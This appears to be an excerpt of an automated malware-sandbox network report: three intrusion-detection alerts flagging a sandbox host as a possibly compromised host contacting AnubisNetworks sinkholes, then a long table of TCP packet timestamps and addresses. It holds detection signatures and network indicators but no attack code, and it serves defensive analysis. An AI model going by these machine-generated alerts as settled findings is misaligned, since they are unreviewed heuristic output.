                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:15:41.242825+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.1050078TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:15:48.948405+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.1050086TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:15:48.948405+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.1050086TCP

                                                                                                                                                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.161344051 CET49707443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.161359072 CET44349707198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.161617994 CET49707443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.162692070 CET49707443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.162815094 CET44349707198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.162900925 CET49707443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.220637083 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.220690012 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.220796108 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.222457886 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:11.222471952 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.573776960 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.573945999 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.590255976 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.590275049 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.590764999 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.635461092 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.810561895 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.855361938 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.338875055 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339031935 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339051008 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339080095 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339179039 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339179039 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339214087 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339279890 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506714106 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506788969 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506887913 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506922960 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506939888 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.507019997 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583261967 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583323002 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583339930 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583369970 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583389997 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583432913 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637073040 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637115002 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637239933 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637271881 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637317896 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.690826893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.690865040 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.690979958 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.691020012 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.691066980 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725138903 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725173950 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725281000 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725320101 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725369930 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787424088 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787461996 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787611008 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787647963 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787713051 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811039925 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811078072 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811181068 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811198950 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811261892 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834451914 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834480047 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834564924 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834577084 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834628105 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.853655100 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.853688002 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.853789091 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.853801012 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.853846073 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.867225885 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.867301941 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.867398024 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.867428064 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.867463112 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.867511034 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.981040001 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.981129885 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.981169939 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.981205940 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.981225014 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.981254101 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.990597010 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.990648031 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.990675926 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.990684032 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.990726948 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.000979900 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.001023054 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.001061916 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.001071930 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.001096964 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.001131058 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.011152983 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.011205912 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.011236906 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.011245012 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.011286974 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.019458055 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.019478083 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.019545078 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.019553900 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.019598007 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.020770073 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.030051947 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.030078888 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.030143023 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.030153990 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.040064096 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.040107965 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.040185928 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.040201902 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.040241957 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.048667908 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.048686981 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.048777103 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.048789024 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.096499920 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.185776949 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.185870886 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.185874939 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.185916901 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.185933113 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.186290026 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.192689896 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.192764044 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.192784071 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.192811966 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.192833900 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.192851067 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.200907946 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.200963020 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.201008081 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.201050997 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.201080084 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.201102972 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.209474087 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.209522009 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.209569931 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.209584951 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.209614038 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.209635019 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.216192961 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.216212034 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.216280937 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.216288090 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.216330051 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.224973917 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.224991083 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.225058079 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.225064039 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.225099087 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.232300997 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.232319117 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.232400894 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.232407093 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.232450962 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240586042 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240693092 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240711927 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240721941 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240755081 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240777969 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388593912 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388674974 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388763905 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388792992 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388808966 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388839960 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.395874977 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.395941973 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.396049023 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.396075964 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.396095037 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.396116972 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.403922081 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.403954029 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.404047966 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.404071093 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.404114008 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412358999 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412398100 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412538052 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412569046 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412718058 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.419806957 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.419837952 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.420033932 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.420061111 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.420118093 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428200006 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428229094 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428354979 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428364038 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428428888 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435246944 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435277939 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435381889 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435393095 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435482025 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443495989 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443526030 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443625927 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443645954 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443701982 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.589782953 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.589812040 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.589952946 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.589986086 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.590039015 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598012924 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598042011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598162889 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598171949 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598221064 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605195999 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605222940 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605340004 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605349064 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605402946 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613629103 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613686085 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613805056 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613816023 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613867998 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.621423960 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.621448994 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.621516943 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.621525049 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.621578932 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.629448891 CET44349708198.252.105.91192.168.2.10
